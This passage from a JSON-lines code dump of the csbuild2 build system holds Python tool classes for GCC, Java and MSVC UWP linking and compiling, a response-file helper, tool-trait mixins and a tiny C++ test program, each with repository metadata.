[\n\t\t\t\"-Wl,--enable-new-dtags\",\n\t\t\t\"-Wl,-R,{}\".format(self._getRpathOriginVariable()),\n\t\t]\n\n\t\trpaths = set()\n\t\toutDir = os.path.dirname(self._getOutputFiles(project)[0])\n\n\t\tif project.autoResolveRpaths:\n\t\t\t# Add RPATH arguments for each linked library path.\n\t\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\t\tlibDir = os.path.dirname(lib)\n\t\t\t\trpath = self._resolveRpath(outDir, libDir)\n\n\t\t\t\tif rpath:\n\t\t\t\t\trpaths.add(rpath)\n\n\t\t# Add RPATH arguments for each path specified in the makefile.\n\t\tfor path in self._rpathDirectories:\n\t\t\tpath = self._resolveRpath(outDir, path)\n\n\t\t\tif path:\n\t\t\t\trpaths.add(path)\n\n\t\t# Add each RPATH to the argument list.\n\t\tfor path in sorted(rpaths):\n\t\t\targs.append(\"-Wl,-R,{}\".format(path))\n\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\treturn [\"-l:{}\".format(os.path.basename(lib)) for lib in self._actualLibraryLocations.values()]\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"-Wl,--no-as-needed\", \"-Wl,--start-group\"]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\"-Wl,--end-group\"]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n\n\tdef _getSystemArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getLibrarySearchDirectories(self):\n\t\treturn self._libraryDirectories\n" }, { "alpha_fraction": 0.6309846639633179, "alphanum_fraction": 0.6317374110221863, "avg_line_length": 31.71921157836914, "blob_id": "89077a1d6bd20d6ff1843bb8a50cd57598bd1a68", "content_id": "ebfe05e3ef5cea3063b1136ac224764bad51fc67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6642, 
"license_type": "no_license", "max_line_length": 124, "num_lines": 203, "path": "/csbuild/tools/java_compilers/java_compiler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: java_compiler_base\n\t:synopsis: Base class for Java compilers.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\nimport threading\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.java_tool_base import JavaToolBase\n\nfrom ... import commands, log\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass JavaCompilerBase(JavaToolBase):\n\t\"\"\"\n\tBase class for Java compilers.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = { \".java\" }\n\toutputFiles = { \".class\" }\n\n\t_lock = threading.Lock()\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._srcPaths = projectSettings.get(\"javaSrcPaths\", ordered_set.OrderedSet())\n\t\tself._classPaths = projectSettings.get(\"javaClassPaths\", ordered_set.OrderedSet())\n\n\t\tJavaToolBase.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddJavaSourcePaths(*dirs):\n\t\t\"\"\"\n\t\tAdd directories in which to search for Java source files.\n\n\t\t:param dirs: List of directories.\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"javaSrcPaths\", [os.path.abspath(directory) for directory in dirs])\n\n\t@staticmethod\n\tdef AddJavaClassPaths(*dirs):\n\t\t\"\"\"\n\t\tAdd directories in which to search for compiled Java classes.\n\n\t\t:param dirs: List of directories.\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"javaClassPaths\", [os.path.abspath(directory) for directory in dirs])\n\n\n\t################################################################################\n\t### Public 
API\n\t################################################################################\n\n\tdef GetJavaSourcePaths(self):\n\t\t\"\"\"\n\t\tGet the list of Java source file directories.\n\n\t\t:return: Source directories\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._srcPaths\n\n\tdef GetJavaClassPaths(self):\n\t\t\"\"\"\n\t\tGet the list of Java class directories.\n\n\t\t:return: Class directories\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._classPaths\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from compiling a project.\n\n\t\t:param project: Project being compiled.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being compiled.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Tuple of files that will be produced from compiling.\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the command to compile the provided set of files for the provided project.\n\n\t\t:param project: Project being compiled.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being compiled.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Command to execute, broken into a list, as would be provided to subprocess functions.\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tlog.Build(\n\t\t\t\"Compiling Java files for {} ({}-{}-{}): [{}]\",\n\t\t\tinputProject.outputName,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName,\n\t\t\t\", \".join(\n\t\t\t\tsorted([f.filename for f in inputFiles])\n\t\t\t)\n\t\t)\n\n\t\t# Create the class root intermediate directory.\n\t\tclassRootPath = os.path.join(inputProject.intermediateDir, self._javaClassRootDirName)\n\t\tif not os.access(classRootPath, os.F_OK):\n\t\t\t# Put a lock on the directory just in case something else happens to be trying to create it at the same time.\n\t\t\twith JavaCompilerBase._lock: # pylint:disable=not-context-manager\n\t\t\t\tif not os.access(classRootPath, os.F_OK):\n\t\t\t\t\tos.makedirs(classRootPath)\n\n
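\t\t# commands.Run is expected to return a (returncode, stdout, stderr) tuple (the gcc linker\n\t\t# uses the same contract); only the return code is inspected here.\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles, classRootPath), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\n\t\toutputFiles = 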
self._getOutputFiles(inputProject, inputFiles, classRootPath)\n\n\t\t# If the project generated no class files, flag that as an error.\n\t\tif not outputFiles:\n\t\t\tlog.Error(\"Project {} generated no class files\".format(inputProject.outputName))\n\n\t\treturn outputFiles\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6554622054100037, "avg_line_length": 12.222222328186035, "blob_id": "b62281307a28f70f6faa1ee9df672275c7a504e9", "content_id": "38ec9686ebea4a8c008a1a1a2981dddc49ec2a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 119, "license_type": "no_license", "max_line_length": 35, "num_lines": 9, "path": "/functional_tests/cpp_rpath_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include \"header.hpp\"\n#include \"../libhello/libhello.hpp\"\n\nint main()\n{\n\thello_world();\n\tgoodbye_world();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6890106201171875, "alphanum_fraction": 0.6902996897697449, "avg_line_length": 35.94047546386719, "blob_id": "f392963e8f8bbec55b5a207dea689c82901b148c", "content_id": "2afbd8ded0630b748561dc3c882f8727a0ed903b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 135, "num_lines": 84, "path": "/csbuild/tools/linkers/msvc_uwp_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_uwp_linker\n\t:synopsis: MSVC linker tool for C++, d, asm, etc, to build apps for the Universal Windows Platform\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .msvc_linker import MsvcLinker\n\nclass MsvcUwpLinker(MsvcLinker):\n\t\"\"\"\n\tMSVC linker tool implementation for building apps for the Universal Windows Platform\n\t\"\"\"\n\toutputFiles = {\".exe\", \".lib\", \".dll\", \".winmd\"}\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcLinker.__init__(self, projectSettings)\n\n\t\t# Enable UWP builds so the base tool sets up the toolchain backend properly.\n\t\tself._enableUwp = True\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFiles = MsvcLinker._getOutputFiles(self, project)\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles = set(outputFiles)\n\t\t\toutputFiles.add(\"{}.winmd\".format(os.path.join(project.outputDir, project.outputName)))\n\t\t\toutputFiles = tuple(outputFiles)\n\n\t\treturn outputFiles\n\n\tdef _getUwpArgs(self, project):\n\t\targs = [\n\t\t\t\"/APPCONTAINER\",\n\t\t]\n\t\treturn args\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"WindowsApp.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\targs = MsvcLinker._getOutputFileArgs(self, project)\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"/WINMD\",\n\t\t\t\t\"/WINMDFILE:{}.winmd\".format(os.path.join(project.outputDir, project.outputName))\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.7134146094322205, "alphanum_fraction": 0.7167682647705078, "avg_line_length": 30.238094329833984, "blob_id": "4d2f6f27c4e450f80c0b1774c550cc70ebafe9a1", "content_id": "b269df8f753b7779477606c375509380a308c229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3280, "license_type": "no_license", "max_line_length": 140, "num_lines": 105, "path": "/csbuild/_utils/response_file.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: response_file\n\t:synopsis: Helper class for creating a tool response file.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . import PlatformBytes\n\nimport os\nimport platform\nimport threading\n\nclass ResponseFile(object):\n\t\"\"\"\n\tResponse file helper class.\n\n\t:param project: Project used with the response file.\n\t:type project: :class:`csbuild._build.project.Project`\n\n\t:param name: Basename of the response file.\n\t:type name: str\n\n\t:param cmd: List of command arguments to write into the response file.\n\t:type cmd: list[str]\n\t\"\"\"\n\t_lock = threading.Lock()\n\n\tdef __init__(self, project, name, cmd):\n\t\tdirPath = os.path.join(project.csbuildDir, \"cmd\", project.outputName, project.toolchainName, project.architectureName, project.targetName)\n\t\tfileMode = 438 # Octal 0666\n\t\tflags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC\n\n\t\t# The O_NOINHERIT constant only exists on Windows, so we can't do this in the pythonic way.\n\t\tif platform.system() == \"Windows\":\n\t\t\tflags |= os.O_NOINHERIT # pylint:disable=no-member\n\n\t\t# Create the output directory.\n\t\tif not os.access(dirPath, os.F_OK):\n\t\t\t# TODO: Investigate ways to handle this in a lock-free manner.\n\t\t\twith ResponseFile._lock: # pylint:disable=not-context-manager\n\t\t\t\tif not os.access(dirPath, os.F_OK):\n\t\t\t\t\tos.makedirs(dirPath)\n\n\t\tself._filePath = os.path.join(dirPath, name)\n\t\tself._commandList = [\n\t\t\t\"\\\"{}\\\"\".format(arg)\n\t\t\t\tif \" \" in arg and \"\\\"\" not in arg\n\t\t\t\t\telse arg\n\t\t\tfor arg in cmd if arg\n\t\t]\n\n\t\tf = os.open(self._filePath, flags, fileMode)\n\n\t\tos.write(f, PlatformBytes(\"\\n\".join([arg.replace(\"\\\\\", r\"\\\\\") for arg in self._commandList])))\n\t\tos.fsync(f)\n\t\tos.close(f)\n\n\t@property\n\tdef filePath(self):\n\t\t\"\"\"\n\t\tGet the path to the response file.\n\t\t:return: Response file path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._filePath\n\n\t@property\n\tdef commandList(self):\n\t\t\"\"\"\n\t\tGet the original list of commands.\n\t\t:return: Original command list.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\treturn self._commandList\n\n\tdef AsString(self):\n\t\t\"\"\"\n\t\tGet the full string of the command arguments.\n\t\t:return: Original command list as string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \" \".join(self._commandList)\n
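\n# A minimal usage sketch (\"cmdExe\" and \"cmd\" stand in for a tool executable and its\n# argument list; gcc_linker consumes this class the same way):\n#     responseFile = ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n#     cmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n" }, { "alpha_fraction": 0.7535627484321594, "alphanum_fraction": 0.7550169825553894, "avg_line_length": 29.517751693725586, "blob_id": "6b870a73bfeed08293b7c7d1a697d1bc4793985c", "content_id": "cc547ac4dea00f63d317190c512c1cd18126005a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10315, "license_type": "no_license", "max_line_length": 99, "num_lines": 338, "path": "/csbuild/tools/common/tool_traits.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 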
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tool_traits\n\t:synopsis: Optional add-ins for tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom ... import log\nfrom ...toolchain import Tool\nfrom ..._utils import ordered_set\n\nclass HasDebugLevel(Tool):\n\t\"\"\"\n\tHelper class to add debug level support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass DebugLevel(object):\n\t\t\"\"\"\n\t\t'enum' representing various levels of debug information\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tEmbeddedSymbols = 1\n\t\tExternalSymbols = 2\n\t\tExternalSymbolsPlus = 3\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._debugLevel = projectSettings.get(\"debugLevel\", HasDebugLevel.DebugLevel.Disabled)\n\n\t@staticmethod\n\tdef SetDebugLevel(debugLevel):\n\t\t\"\"\"\n\t\tSet a project's desired debug level.\n\n\t\t:param debugLevel: Project debug level.\n\t\t:type debugLevel: :class:`csbuild.tools.common.tool_traits.HasDebugLevel.DebugLevel`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"debugLevel\", debugLevel)\n\n\t@staticmethod\n\tdef SetDebugLevelIfUnset(debugLevel):\n\t\t\"\"\"\n\t\tSet a project's desired debug level. 
If already set, does nothing.\n\n\t\t:param debugLevel: Project debug level.\n\t\t:type debugLevel: :class:`csbuild.tools.common.tool_traits.HasDebugLevel.DebugLevel`\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"debugLevel\"):\n\t\t\tlog.Info(\"Setting default debug level.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"debugLevel\", debugLevel)\n\n\nclass HasOptimizationLevel(Tool):\n\t\"\"\"\n\tHelper class to add optimization level support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass OptimizationLevel(object):\n\t\t\"\"\"\n\t\t'enum' representing various optimization levels\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tSize = 1\n\t\tSpeed = 2\n\t\tMax = 3\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._optLevel = projectSettings.get(\"optLevel\", HasOptimizationLevel.OptimizationLevel.Disabled)\n\n\t@staticmethod\n\tdef SetOptimizationLevel(optLevel):\n\t\t\"\"\"\n\t\tSet a project's desired optimization level.\n\n\t\t:param optLevel: Project optimization level.\n\t\t:type optLevel: :class:`csbuild.tools.common.tool_traits.HasOptimizationLevel.OptimizationLevel`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"optLevel\", optLevel)\n\n\t@staticmethod\n\tdef SetOptimizationLevelIfUnset(optLevel):\n\t\t\"\"\"\n\t\tSet a project's desired optimization level. If already set, does nothing.\n\n\t\t:param optLevel: Project optimization level.\n\t\t:type optLevel: :class:`csbuild.tools.common.tool_traits.HasOptimizationLevel.OptimizationLevel`\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"optLevel\"):\n\t\t\tlog.Info(\"Setting default optimization level.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"optLevel\", optLevel)\n\n\nclass HasStaticRuntime(Tool):\n\t\"\"\"\n\tHelper class to add static runtime support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._staticRuntime = projectSettings.get(\"staticRuntime\", False)\n\n\t@staticmethod\n\tdef SetStaticRuntime(staticRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the static runtime library.\n\n\t\t:param staticRuntime: Use the static runtime library.\n\t\t:type staticRuntime: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"staticRuntime\", staticRuntime)\n\n\nclass HasDebugRuntime(Tool):\n\t\"\"\"\n\tHelper class to add debug runtime support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._debugRuntime = projectSettings.get(\"debugRuntime\", False)\n\n\t@staticmethod\n\tdef SetDebugRuntime(debugRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the debug runtime library.\n\n\t\t:param debugRuntime: Use the debug runtime library.\n\t\t:type debugRuntime: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"debugRuntime\", debugRuntime)\n\n\t@staticmethod\n\tdef SetDebugRuntimeIfUnset(debugRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the debug runtime library. 
If already set, does nothing.\n\n\t\t:param debugRuntime: Use the debug runtime library.\n\t\t:type debugRuntime: bool\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"debugRuntime\"):\n\t\t\tlog.Info(\"Setting default debug runtime setting.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"debugRuntime\", debugRuntime)\n\n\nclass HasIncludeDirectories(Tool):\n\t\"\"\"\n\tHelper class to add C++ include directories.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._includeDirectories = projectSettings.get(\"includeDirectories\", ordered_set.OrderedSet())\n\n\t@staticmethod\n\tdef AddIncludeDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to search for headers in.\n\n\t\t:param dirs: list of directories\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"includeDirectories\", [os.path.abspath(d) for d in dirs if d])\n\n\tdef GetIncludeDirectories(self):\n\t\t\"\"\"\n\t\tGet the list of include directories.\n\n\t\t:return: include dirs\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._includeDirectories\n\n\tdef SetupForProject(self, project):\n\t\tself._includeDirectories = ordered_set.OrderedSet(self._includeDirectories)\n\n\nclass HasDefines(Tool):\n\t\"\"\"\n\tHelper class to add C++ defines and undefines.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._defines = projectSettings.get(\"defines\", ordered_set.OrderedSet())\n\t\tself._undefines = projectSettings.get(\"undefines\", ordered_set.OrderedSet())\n\n\t@staticmethod\n\tdef AddDefines(*defines):\n\t\t\"\"\"\n\t\tAdd preprocessor defines to the current project.\n\n\t\t:param defines: List of defines.\n\t\t:type defines: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"defines\", defines)\n\n\t@staticmethod\n\tdef AddUndefines(*undefines):\n\t\t\"\"\"\n\t\tAdd preprocessor undefines to the current project.\n\n\t\t:param undefines: List of undefines.\n\t\t:type undefines: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"undefines\", undefines)\n\n\nclass HasCcLanguageStandard(Tool):\n\t\"\"\"\n\tHelper class to set the C language standard for a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._ccStandard = projectSettings.get(\"ccLanguageStandard\", None)\n\n\t@staticmethod\n\tdef SetCcLanguageStandard(standard):\n\t\t\"\"\"\n\t\tSet the C language standard.\n\n\t\t:param standard: C language standard.\n\t\t:type standard: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ccLanguageStandard\", standard)\n\n\nclass HasCxxLanguageStandard(Tool):\n\t\"\"\"\n\tHelper class to set the C++ language standard for a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._cxxStandard = projectSettings.get(\"cxxLanguageStandard\", None)\n\n\t@staticmethod\n\tdef 
SetCxxLanguageStandard(standard):\n\t\t\"\"\"\n\t\tSet the C++ language standard.\n\n\t\t:param standard: C++ language standard.\n\t\t:type standard: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"cxxLanguageStandard\", standard)\n\n\nclass HasIncrementalLink(Tool):\n\t\"\"\"\n\tHelper class to enable incremental linking in linker tools that support it.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._incrementalLink = projectSettings.get(\"incrementalLink\", False)\n\n\t@staticmethod\n\tdef SetIncrementalLink(incrementalLink):\n\t\t\"\"\"\n\t\tSet the incremental link property.\n\n\t\t:param incrementalLink: Incremental link toggle\n\t\t:type incrementalLink: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"incrementalLink\", incrementalLink)\n\nclass HasWinRtSupport(Tool):\n\t\"\"\"\n\tHelper class to add support for compiling WinRT projects.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass WinRtSupport(object):\n\t\t\"\"\"\n\t\t'enum' representing various levels of WinRT support\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tEnabled = 1\n\t\tEnabledNoStdLib = 2\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._winrtSupport = projectSettings.get(\"winrtSupport\", HasWinRtSupport.WinRtSupport.Disabled)\n\n\t@staticmethod\n\tdef SetWinRtSupport(winrtSupport):\n\t\t\"\"\"\n\t\tSet WinRT support.\n\n\t\t:param winrtSupport: WinRT support level\n\t\t:type winrtSupport: :class:`csbuild.tools.common.tool_traits.HasWinRtSupport.WinRtSupport`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"winrtSupport\", winrtSupport)\n" }, { "alpha_fraction": 0.6051668524742126, "alphanum_fraction": 0.6111948490142822, "avg_line_length": 112.31707000732422, "blob_id": "ba540d3d3e63ea5efbc2c0f5a351c315d5cf6c7d", "content_id": "78bc6298776d5165bf0525d76038095b91911c01", "detected_licenses": [], "is_generated": false, 